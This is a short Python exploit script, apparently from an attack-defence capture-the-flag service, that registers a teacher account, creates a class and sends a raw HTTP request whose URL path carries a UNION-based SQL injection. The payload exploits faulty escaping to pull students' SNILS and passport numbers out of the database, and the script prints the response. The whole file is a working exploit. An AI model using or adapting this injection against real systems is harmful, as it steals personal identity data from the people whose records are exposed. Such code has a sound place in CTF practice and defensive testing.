srab/sploits/01_sql_bad_escape.py

#!/usr/bin/env python3

import socket
import common

credentials = common.register_random_teacher()
headers = common.get_auth_headers(credentials)
class_id = common.create_class(credentials)

injection = (
    "01%2F01%2F2077' "
    "' UNION SELECT id AS id, user_id AS class_id, snils AS date, "
    "passport AS title, 'gotcha' AS homework FROM students "
    "WHERE '-1' = '-1"
)

path = f"/api/classes/{class_id}/lessons/{injection}"
url = common.BASE + path

s = socket.create_connection((common.HOST, common.PORT))

s.sendall(f"""GET {path} HTTP/1.1
Authorization: {headers["Authorization"]}

""".encode("utf-8"))

chunks = []

while True:
    data = s.recv(4096)
    if not data:
        break

    chunks.append(data)

body = b"".join(chunks).decode("utf-8")

print(body)